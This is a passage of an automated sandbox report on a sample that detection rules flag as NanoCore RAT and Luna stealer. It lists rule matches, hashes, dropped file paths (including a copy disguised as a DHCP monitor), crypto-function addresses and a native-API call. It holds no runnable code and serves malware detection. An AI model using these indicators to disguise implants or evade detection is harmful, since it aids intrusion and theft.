Source: 2.2.nano.exe.32b1744.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.32b1744.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\ProgramData\output.exe, type: DROPPED Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\ProgramData\nano.exe, type: DROPPED Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\ProgramData\nano.exe, type: DROPPED Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\ProgramData\nano.exe, type: DROPPED Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Detected potential crypto function
Source: C:\ProgramData\nano.exe Code function: 2_2_00A8524A 2_2_00A8524A
Source: C:\ProgramData\nano.exe Code function: 2_2_011E7ABE 2_2_011E7ABE
Source: C:\ProgramData\nano.exe Code function: 2_2_053B8918 2_2_053B8918
Source: C:\ProgramData\nano.exe Code function: 2_2_053BB1E8 2_2_053BB1E8
Source: C:\ProgramData\nano.exe Code function: 2_2_053B3850 2_2_053B3850
Source: C:\ProgramData\nano.exe Code function: 2_2_053B2FA8 2_2_053B2FA8
Source: C:\ProgramData\nano.exe Code function: 2_2_053B23A0 2_2_053B23A0
Source: C:\ProgramData\nano.exe Code function: 2_2_053B9518 2_2_053B9518
Source: C:\ProgramData\nano.exe Code function: 2_2_053B95DF 2_2_053B95DF
Source: C:\ProgramData\nano.exe Code function: 2_2_053B306F 2_2_053B306F
Source: C:\ProgramData\output.exe Code function: 5_2_00007FFC085B3551 5_2_00007FFC085B3551
Contains functionality to call native functions
Source: C:\ProgramData\nano.exe Code function: 2_2_054D18D2 NtQuerySystemInformation, 2_2_054D18D2
Source: C:\ProgramData\nano.exe Code function: 2_2_054D1897 NtQuerySystemInformation, 2_2_054D1897
Sample file name is different from the original file name gathered from version info
Source: 4Y85lSOUJ0.exe Binary or memory string: OriginalFilename vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameoutput.exe4 vs 4Y85lSOUJ0.exe
